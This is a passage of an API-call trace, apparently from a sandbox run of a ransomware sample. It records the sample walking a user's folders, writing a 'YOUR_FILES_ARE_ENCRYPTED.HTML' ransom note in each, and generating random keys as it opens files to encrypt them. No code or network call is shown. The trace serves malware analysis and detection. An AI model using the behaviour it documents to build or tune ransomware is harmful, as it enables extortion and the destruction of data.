(pszPath="_ DUv9WKDNJMEUH.ots") returned=".ots" [0167.332] lstrlenW (lpString=".ots") returned 4 [0167.332] PathFindExtensionW (pszPath="_ DUv9WKDNJMEUH.ots") returned=".ots" [0167.332] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11925970, ftCreationTime.dwHighDateTime=0x1d7dc05, ftLastAccessTime.dwLowDateTime=0xaae23350, ftLastAccessTime.dwHighDateTime=0x1d7e495, ftLastWriteTime.dwLowDateTime=0xaae23350, ftLastWriteTime.dwHighDateTime=0x1d7e495, nFileSizeHigh=0x0, nFileSizeLow=0x5e94, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="_ DUv9WKDNJMEUH.ots", cAlternateFileName="_DUV9W~1.OTS")) returned 0 [0167.332] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.332] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0167.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.333] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.335] CloseHandle (hObject=0x5a0) returned 1 [0167.335] GetProcessHeap () returned 0x270000 [0167.336] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.341] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0167.341] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads") returned 33 [0167.341] GetProcessHeap () returned 0x270000 [0167.341] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.342] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads" [0167.342] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\*" [0167.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.343] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\desktop.ini") returned 45 [0167.343] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.343] lstrlenW (lpString=".ini") returned 4 [0167.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0167.343] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0167.343] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0167.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0167.344] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0167.346] CloseHandle (hObject=0x5a0) returned 1 [0167.346] GetProcessHeap () returned 0x270000 [0167.347] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0167.347] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0167.347] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites") returned 33 [0167.347] GetProcessHeap () returned 0x270000 [0167.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0167.347] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites" [0167.347] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\*" [0167.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0167.348] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.348] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b5a930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.348] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\desktop.ini") returned 45 [0167.348] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.348] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.348] lstrlenW (lpString=".ini") returned 4 [0167.348] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.348] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", cAlternateFileName="")) returned 1 [0167.348] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links") returned 39 [0167.348] GetProcessHeap () returned 0x270000 [0167.348] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.350] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links" [0167.350] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\*" [0167.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.350] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.351] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.351] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\desktop.ini") returned 51 [0167.351] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.351] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.351] lstrlenW (lpString=".ini") returned 4 [0167.351] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.351] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd620c710, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0167.351] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\Web Slice Gallery.url") returned 61 [0167.351] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.351] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0167.351] lstrlenW (lpString=".url") returned 4 [0167.351] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0167.351] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.352] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=226) returned 1 [0167.352] CloseHandle (hObject=0x598) returned 1 [0167.352] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd620c710, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0167.352] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.352] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0167.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.354] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.356] CloseHandle (hObject=0x5ac) returned 1 [0167.356] GetProcessHeap () returned 0x270000 [0167.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.357] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0167.357] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites") returned 52 [0167.357] GetProcessHeap () returned 0x270000 [0167.357] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.358] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites" [0167.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\*" [0167.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.360] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.360] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6174190, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0167.360] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 71 [0167.360] lstrcmpW (lpString1="IE Add-on site.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.360] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0167.360] lstrlenW (lpString=".url") returned 4 [0167.360] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0167.360] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.361] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.361] CloseHandle (hObject=0x598) returned 1 [0167.361] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6174190, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0167.361] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 81 [0167.361] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.361] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0167.361] lstrlenW (lpString=".url") returned 4 [0167.361] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0167.361] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.362] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.362] CloseHandle (hObject=0x598) returned 1 [0167.362] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6174190, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0167.362] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 74 [0167.362] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.362] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0167.362] lstrlenW (lpString=".url") returned 4 [0167.362] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0167.362] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.362] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.362] CloseHandle (hObject=0x598) returned 1 [0167.363] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0167.363] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 74 [0167.363] lstrcmpW 